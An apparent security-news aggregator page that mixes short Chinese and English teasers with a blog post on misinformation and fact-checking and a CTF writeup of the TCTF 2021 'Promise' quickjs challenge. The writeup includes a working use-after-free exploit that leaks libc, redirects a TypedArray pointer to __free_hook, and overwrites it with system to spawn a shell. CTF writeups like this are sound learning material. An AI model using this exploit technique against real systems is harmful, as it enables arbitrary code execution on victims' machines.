Aggregator

设备指纹技术是使用更多的信息来完成对终端设备的唯一性识别，在业务中可以有效辨别设备是真实用户还是机器在注册、登录，及时检测出单设备登入多帐号、防止批量注册、登录等操作行为。

通过社群的力量，让微观生态的每一位安全从业者能够担负起时代赋予的使命 -- 实践群的价值

该篇文章总结了在国家级攻防演练中数据库相关利用，旨在帮助红队选手在拿下数据库权限后快速拓展获取服务器权限、WEB应用权限、数据分数，请勿非法利用。

在编译Java项目时将XML文件同时包含到CodeQL数据库。

class文件的内部结构你知道多少？

腾讯蓝军和红军十多年案例经验、总结沉淀

K4YT3X https://k4yt3x.com/the-era-of-misinformation/ -

This post is licensed under CC BY-SA 4.0.

“Falsehood flies, and the truth comes limping after it.”

– – Mark Twain, “The Examiner”

The world entered the information age after computers and the Internet was born. Before the modern information highway was built, ordinary people used to have to rely on media such as news papers to obtain information. The birth of Internet enabled individuals to publish and propagate information, which was a great boost to creativity.

However, we may have already entered the era of misinformation. The quote above closely resembles how information propagates today, except Mark Twain never said that, but Jonathan Swift. If you believed Mark Twain ever said that, it only proves the point further.

I would like to attempt to summarize, in this blog post, what misinformation is, why it is harmful, and how to keep yourself afloat in the sea of misinformation. The more that understand misinformation, the less it propagates, and the less harm it causes.

Mis-, Dis-, and Malinformation

Misinformation is a vague term. It mostly means “untruthful information.” However, as more misinformation surfaces, there emerges a need to further classify them to better understand this concept. First Draft, a media that focuses on the topic of misinformation, categorizes misinformation into three categories: misinformation, disinformation, and malinformation. For simplicity’s sake, I will refer to all three of them collectively as misinformation.

Figure 1: Differences between misinformation, disinformation, and malinformation (reference)

Types of Misinformation

First Draft also identifies seven types of misinformation based on the misinformation’s degree of malintent and percentage of false information.

Figure 2: Types of mis-, dis-, and malinformation (reference)

The Harm of Misinformation

Nothing needs to be addressed if there are no issues. Why is misinformation bad for us then?

Because knowing the truth matters.

Knowing the truth empowers us to make the best choices for ourselves and for the society. On the contrary, the propagation of misinformation would often benefit only a small quadrant of people. You might find the workable ethical theories helpful in analyzing this kind of questions.

A study conducted by MIT shows that Tweets with misinformation propagate at a speed of 600% and is 70% more likely to get retweeted as compared to Tweets with genuine information. Contents with misinformation generate a lot of activities and traffic on social media platforms and attract users. As businesses, they have no reason to spontaneously take down what is financially beneficial for them.

Figure 3: Information propagation comparison (reference)

Sometimes misinformation passes us by harmlessly, sometimes they cause dire consequences. A great recent example is the misleading reports of Ivermectin’s effectiveness on Covid-19 for humans have resulted in the public injecting high-doses of Ivermectin in the hope of becoming immune against Covid-19.

Figure 4: A news report from early 2020 saying that Ivermectin kills Covid-19 viruses (source)

This report did NOT make it clear that, while Ivermectin kills Covid-19 in Petri dishes, it is not proven safe for humans. People died after overdosing Ivermectin, believing that it could cure Covid-19. Pouring bleach into the Petri dish would also kill the viruses, but that doesn’t mean you should drink bleach. You could image how such misinformation could also lead to political turmoil or other problems.

Figure 5: xkcd comic, “Cells” (CC BY-NC 2.5)

Eventually, the FDA published an article to debunk the rumours, but people are still believing the rumours. Why?

1. Cognitive Biases

We all have cognitive biases, i.e., inherent brain “defects” which all humans have that hinder us from making perfectly sane and logical judgments. We have a lot of them too. You can take a look at some of the most common cognitive biases here.

Figure 6: The cognitive bias codex (CC BY-SA 4.0)

There are way too many to list, so here are some of the common ones that I think have a lot to do with misinformation.

• Stereotyping: People tend to have a generalized assumption about a particular group of people.
  • A report about Germans suceeding something is more likely to be believed than a report about the Germans screwing something up, because “Germans are rigorous.”
• Confirmation Bias: People tend to selectively gather only evidence that support what they already believe, disregarding conflicting information.
  • When you already firmly believe that Ivermectin will treat Covid-19, you might Google for articles that will support and reinforce your opinion rather than those that contradicts your beliefs. However, what you find may just be more misinformation.
• Bandwagon Effect: People tend to follow the crowd and do what others are doing.
  • “All the news media are reporting that, so that must be true.”
  • “They’re all doing it, so I probably should, too.”
• Reactive Devaluation: People tend to automatically devaluate their adversary’s opinions.
  • A strong supporter of the Democrats may automatically view all policies that the Republicans make deterimental, without actually understanding it.

The cognitive biases that I have listed here are merely the tip of the iceberg. You can start here if you would like to learn more.

2. Rhetological Fallacies

Rhetological is a word that means rhetorical and logical. Rhetological fallacies means rhetorical techniques and logical fallacies. Rhetological fallacies are what can be used to exploit our cognitive biases or simply fool us, leading us to draw illogical conclusions.

For example, the definition of “Circular Logic” is “a conclusion is derived from a premise based on the conclusion.” For instance, some people would argue that privacy only matters to those that have something to hide, so you must be trying to hide something if you want privacy.

There are currently 54 rhetological fallacies identified by David McCandless. Take a look at their beautiful website to see all of them. It is important to be aware of these fallacies so you can identify them when you see them.

Figure 7: Rhetological Fallacies (source)

3. The Inability to Verify

A Stanford research paper finds that professional fact checkers are a lot better at distinguishing genuine information from misinformation than historians and students. Chances are, you suck at verifying too.

Figure 8: Fact-checking success rate between professional fact-checkers, historians, and students

If you do not want to read the whole paper thoroughly, here are some of the important takeaways.

Figure 9: Fact check tips from Stanford’s research (reference)

Fact checking is not an easy task. There is a lot learning to do if you want to fact check efficiently and accurately. Fortunately, there are a lot of materials out there around this topic. First Draft’s Verifying Online Information is an excellent comprehensive guide that you can start with.

The Solution: Trust, But Verify

The purpose of this blog post is not to tell you that the Internet is full of lies and that you shouldn’t take a word from it. Rather, it is to educate you about one of the many dangers you might face when you’re on it.

First Draft’s Verifying Online Information guide lists five fundamental steps you should follow to fact check online information. First Draft calls these five steps the “five pillars of verification.”

• Provenance
  • Check if the content is original and authentic
• Source
  • Check if the content’s source is contaminated
• Date
  • Check the time the content is created/shared
• Location
  • Check the location where the account is established, the website is created, or the content is captured
• Motivation
  • Check why was the account established, the website created, or the content captured.
  • Who would be advantaged by this content? Who would be disadvantaged?

You might have noticed that this post has mentioned First Draft’s Verifying Online Information for more than once. This is because this guide is of good quality. You should definitely check it out if you want to learn more about fact checking.

Helpful Verification Tools

Below are a few of my personal recommended tools that may help you to fact check. There are a lot more tools you can use to fact check out there. Take a look at First Draft’s Toolbox for even more tools you can use.

1. Search Engines

As Stanford’s research paper has suggested, it is important to take bearings and read laterally when you are not sure if a piece of information is genuine. You can use search engines to look up if any other credible sources have published information on the same topic.

2. Manipulated Content Identifier

Dis- and malinformation contain manipulated or fabricated contents. A quick Google reverse image search may help you to determine whether an images has been PhotoShopped. A course by Reuters News Agency will teach you how to identify manipulated media. There are also automated tools like the Fake News Debunker that may come in handy.

3. Fact Checking Websites

A lot of news agencies or organizations host sites that regularly debunk recent rumours. Below are a few of the sites you can go to depending on your region.

• USA
  • FactCheck
  • The Washington Post Fact Checker
• CA
  • FactsCan
• UK
  • Reality Check

4. Google’s Fact Check Explorer

You can fact check using Google’s Fact Check Explorer. Simply enter the question and it will show you a full list of relevant sources and whether they support a claim. Be careful not to overrely on such automated tools. It is still important to read laterally manually.

5. First Draft’s Verification Toolbox

First Draft has created a Verification Toolbox to simplify and streamline the verification process for beginners. You can use this toolbox to look up a wide variety of types of information.

Conclusions

1. Misinformation is everywhere, in many forms, and with many types.
2. Misinformation is bad for you and the society.
3. People trust/like misinformation due to their cognitive biases. You do, too.
4. Become aware of the existence of misinformation and try to avoid believing it.
5. Untrained individuals can hardly identify news. You need to learn how.
6. There are lots of tools and techniques you can use to make fact checking easier.

I hope you found this post useful. Feel free to comment below or contact me if you think any of the information in this post is inaccurate or missing.

- https://k4yt3x.com/the-era-of-misinformation/ - 2019-2024 K4YT3X. All rights reserved.

文后附有完整代码。

Last weekend we have participated TCTF 2021 Final and got 2nd place! Congratulation! I solved 3 challenges: Secure JIT 2, Promise and krop. Among these, I think Promise is quite worthy to do a full writeup.

0x00 Overview

In this challenge, we need to exploit quickjs engine, which is a lightweight JavaScript engine, and this is actually my first time to exploit this engine. The vulnerability we need to exploit is that when variable is copied to promise result, the reference counter is not incremented, so that use-after-free problem can be triggered. We trigger such UAF using ArrayBuffer instance so that we can manipulate baking storage of ArrayBuffer after it is freed. We utilize this to leak libc address and to rewrite backing store pointer of another TypedArray to achieve arbitrary write that rewrites __free_hook to system to get the shell.

0x01 Prerequisite

Before entering into the challenge, I may need to introduce some basic knowledges about quickjs that are required to solve this challenge.

Variable Representation

In JavaScript we have many types of variables, such as integer, object, array and built-in object(e.i. ArrayBuffer). The JavaScript engine needs to represent these variables in some way. In quickjs, every variable is represented as a JSValue:

// quickjs.h typedef union JSValueUnion { int32_t int32; double float64; void *ptr; } JSValueUnion; typedef struct JSValue { JSValueUnion u; // union that stores *content* of this variable int64_t tag; // tag is used to tell how to interpret `u`, // which stores information about *type* of this variable } JSValue; #define JSValueConst JSValue

The tag can be one of the following values, some parts of the enum are omitted for simplicity:

// quickjs.h enum { /* all tags with a reference count are negative */ // omited for simplicity.... JS_TAG_OBJECT = -1, JS_TAG_INT = 0, JS_TAG_BOOL = 1, JS_TAG_NULL = 2, JS_TAG_UNDEFINED = 3, // omited for simplicity.... /* any larger tag is FLOAT64 if JS_NAN_BOXING */ };

What we need to know is that the sign here is used to tell whether this variable has a reference count: all tags with a reference count are negative. In other word, negative tag means that this variable is managed by heap and positive tag means that it is not managed by heap.

When tag is JS_TAG_OBJECT, ptr field of JSValueUnion is used, and this ptr points to a JSObject structure, which is defined in quickjs.c. All objects in quickjs, including built-in objects like ArrayBuffer, are represented in this way. The first 32 bits of JSObject are always reference count.

Debug

To build the debug version of binary, we can modify BUILDTYPE?=Release to BUILDTYPE?=Debug in Makefile and build according to this.

To look at how specific variable is stored in memory, we have a simple approach: set a breakpoint at function js_math_min_max or quickjs.c:41563, and call Math.min(v) to trigger the breakpoint, because js_math_min_max is the handler for Math.min. Then by inspecting memory layout of JSValueConst *argv or register r8, we can inspect memory representation of variable v.

Garbage Collection

As we see, the garbage collection of quickjs is managed by reference counting, and the object instance will be freed if the reference counting becomes zero. Here is an example illustrating this:

let o = [0x1337]; Math.min(o); // `x/wx argv->u.ptr`: ref_count == 2 // and we can also set breakpoint: // `tb free if $rdi==[address shown above]` // to see when this chunk will be freed let v = o; Math.min(o); // ref_count == 3 o = undefined; Math.min(v); // ref_count == 2 v = undefined; // breakpoint on free is triggered here // before "Finish" is printed console.log("Finish");

One thing that I don’t quite understand is that when we look at ref_count using Math.min approach, it is always one more than the current number of JavaScript variables that point to the object. I would guess there is also an internal reference that contributes to such one more reference count. This problem actually got me stuck for quite long time. Nonetheless, the object will still be freed when number of variables referencing to it decreases to zero, so we can just deem the actual reference count as ref_count - 1.

0x02 Vulnerability

The diff is applied to commit 0a533445f256fb3a628371e24705d3a2532f60f1.

diff --git a/deps/quickjs/src/quickjs.c b/deps/quickjs/src/quickjs.c index a39ff8f..c0a42b2 100644 --- a/deps/quickjs/src/quickjs.c +++ b/deps/quickjs/src/quickjs.c @@ -46175,7 +46175,7 @@ static void fulfill_or_reject_promise(JSContext *ctx, JSValueConst promise, if (!s || s->promise_state != JS_PROMISE_PENDING) return; /* should never happen */ - set_value(ctx, &s->promise_result, JS_DupValue(ctx, value)); + set_value(ctx, &s->promise_result, value); s->promise_state = JS_PROMISE_FULFILLED + is_reject; #ifdef DUMP_PROMISE printf("fulfill_or_reject_promise: is_reject=%d\n", is_reject);

As we can see, JS_DupValue is just to increment ref_count when the variable has reference count (e.i. tag is negative):

static inline JSValue JS_DupValue(JSContext *ctx, JSValueConst v) { if (JS_VALUE_HAS_REF_COUNT(v)) { JSRefCountHeader *p = (JSRefCountHeader *)JS_VALUE_GET_PTR(v); p->ref_count++; } return (JSValue)v; }

Therefore, ref_count that should have been incremented is not incremented when the value is copied to promise result, so the object will be freed when there is still one variable referencing to it, leading to UAF vulnerability.

JavaScript Promise

For more information about Promise in JavaScript, you can read this. One thing to note is that handler of Promise is executed after main code execution finishes, but they can still share all global variables.

0x03 Exploitation Triggering UAF

It is quite easy to trigger the vulnerability: we just need to pass an object to promise result.

function f(a) { Math.min(a) console.log("Resolve2"); } let arr = new ArrayBuffer(0x500); function main() { let p = new Promise((resolve, reject) => { console.log("Promise Init"); resolve(arr); // pass `arr` as promise result }); p.then(f); // set callback handler } main(); console.log("Finish Main");

The execution result is shown below, although the assertion failure is not necessarily triggered all the time:

Promise Init Finish Main Resolve2 tjs: txiki.js/deps/quickjs/src/quickjs.c:5660: gc_decref_child: Assertion `p->ref_count > 0' failed. Aborted (core dumped)

If we inspect reference counter at Math.min(a), we find that ref_count is 3. This is quite weird, because we expect a does not contribute to any reference count due to the bug, and there is only arr referencing to the object so the ref_count should be 2. I would guess there might be some internal reference inside Promise mechanism that is causing such one more ref_count.

What we want is actually 2 variables referencing to the same object but ref_count is one less than it should be (e.i. ref_count == 2). Therefore, setting one of them to undefined can cause the other variable to be UAF. However, the situation described above cannot satisfy this requirement. This actually got me stuck for quite long time.

Considering possible internal reference inside Promise mechanism mentioned above, I was thinking if such internal reference would disappear once this promise handler finishes. The idea is to copy the arr variable into another global variable arr2, and to start another promise handler but this time we pass a variable without reference count, so the bug would not be triggered. Inside this new handler, if we look at ref_count of arr, it becomes 2; and if we set arr to undefined, another global variable arr2 will become UAF!

function f2() { console.log("Resolve3"); Math.min(arr2); // ref_count == 2 arr = undefined; Math.min(arr2); // UAF can be triggered } let arr2; function f(a) { console.log("Resolve2"); arr2 = arr; // increment number of variables referecing to it let p = new Promise((resolve, reject) => { console.log("Promise2 Init"); resolve(0); }); p.then(f2); } // main function is same as above, thus omitted... Exploiting UAF

As we have already shown in the code above, we use ArrayBuffer with large size (so that its backing store does not fit into tcache bins) as the object to trigger UAF. The primary idea is using TypedArray. Instead of storing one reference to ArrayBuffer directly using global variable, we store it inside a TypedArray global variable. Therefore, after the ArrayBuffer is freed, we can still access the freed backing store of ArrayBuffer using TypedArray; this enables us to leak and rewrites the pointers.

However, this sometimes causes a problem: when we access the freed ArrayBuffer backing store using TypedArray, TypedArray will check whether the ArrayBuffer is detached, and this causes a crash because original JSObject of ArrayBuffer is already freed. The idea is to allocate some ArrayBuffer again to fill that freed JSObject of ArrayBuffer so that we can pass this check.

Finally, we need to look at the freed backing store memory inside gdb to see what we can read and write. How do we find the backing store pointer of freed ArrayBuffer using TypedArray? You can do this by reading source code but I would say the easiest approach is to set first few bytes of the buffer to some magic number like 0x13371337, and use tel in gdb to find the which pointer is pointing to such magic bytes. It turns out that this works very well.

By inspecting freed backing store memory in gdb, we find that we can leak libc address. This is great! As for the arbitrary write primitive, we can also allocate some new TypedArrays whose backing store pointers can be stored in the freed backing store memory, so that we can also rewrite this pointer to achieve arbitrary write. Using this we can rewrites __free_hook to system to get the shell. Part of the exploit is shown below:

const abs = []; a1 = undefined; for (let i = 0; i < 8; i++) { abs.push(new ArrayBuffer(8)); // allocate some new `ArrayBuffer` to // prevent crash when checking detechment } const tas = []; for (let i = 0; i < 8; i++) { const ta = new Uint32Array(abs[i]); // we also use these `ArrayBuffer` to create `TypedArray` ta[0] = 1852400175; ta[1] = 6845231; // set first 8 bytes to "/bin/sh" tas.push(ta); } const libc_addr = a0[0x170/4] + a0[0x170/4+1] * 0x100000000 - 0x3ebca0 console.log(hex(libc_addr)); // leak libc address a0[0x1d8/4] = (libc_addr + 0x3ed8e8) % 0x100000000; a0[0x1d8/4 + 1] = ((libc_addr + 0x3ed8e8) - a0[0x1d8/4]) / 0x100000000; // set backing store of `TypedArray` to `__free_hook` tas[0][0] = (libc_addr + 0x4f550) % 0x100000000; tas[0][1] = ((libc_addr + 0x4f550) - tas[0][0]) / 0x100000000; // __free_hook = system

An interesting point to note is that even comment can change heap layout of the freed backing store of ArrayBuffer, so this is the reason why I choose to put comment in writeup instead of in original exploit, which is here.

0x04 Conclusion

This is quite an interesting and hard challenge, we got 2nd blood and there are 3 solves eventually, and I have learned a lot about quickjs in this challenge. Thanks for the author for making this challenge.

在本系列中，我们将对以太坊现有的安全问题和前沿的各类型漏洞挖掘方法进行综述。本文是本系列的第一篇文章，主要介绍以太坊的机制和存在的安全问题的分类。 01 什么是以太坊智能合约？ 以太坊智能合约基于区块链（Blockchain）技术，作为一种旨在以信息化方式传播、验证或执行的计算机协议，为各类分布式应用服务提供了基础。简单来讲：如果把比特币看作是分布式的记账本；以太坊便是可以运行程序的分布式计算平台，程序运行的基础则是Solidity智能合约。 智能合约早在1995年就由尼克萨博提出，

通过编写CodeQL脚本来查询响应包中是否包含了我所关心的敏感数据（例如手机号、身份证号），其中的一种情景是返回值是Map类型的变量，所以分享一下CodeQL对Map类型的一些支持。

Chris Ensor highlights some important elements of the NCSC's new Technology Assurance strategy.

很喜欢支付宝收款码的这组皮肤

一个最典型的要使用pu_relax()锁的场景是忙等待（也就是死循环等一个事情的发生），在内核里面有大量的代码，比如等寄存器状态：比如做延迟：简单来说，你如果在内核里面写了忙等待的代码，都...

What do hay storage, Akamai?s Edge Connect solution, and machine learning have in common? We use the serverless machine learning system to keep our hay storage safe and secure.

不知不觉中BurpCrypto从诞生到现在已经一岁半了，在这段时间里我对插件的基础功能进行了持续的Bug修复与 …

继续阅读“BurpCrypto未来开发计划”

Summary Researchers at Claroty discovered 11 vulnerabilities in NagiosXI that, in combination, could be used to take over network infrastructure remotely. Updates to NagiosXI have been released to address the issues. Overview Eleven vulnerabilities in NagiosXI were discovered and disclosed by researchers at Claroty. These include remote code execution (RCE), server-side request forgery (SSRF), SQL injection, local privilege escalation (LPE), local file inclusion, open redirect, and path traversal vulnerabil

This week, Gartner released its new 2021 Magic Quadrant for Web Application and API Protection (WAAP) report, which replaces the Magic Quadrant for Web Application Firewalls (WAF) report, and Akamai has been named a Leader. Akamai was named a Leader in the four previous WAF Magic Quadrants.

上课和搬砖的闲暇时间摸鱼打了个第五空间网络安全大赛，也就随意看了看Misc题。

See the most recent research from Amit Serper on a vulnerability in Autodiscover from Microsoft Outlook that affects credential leaks.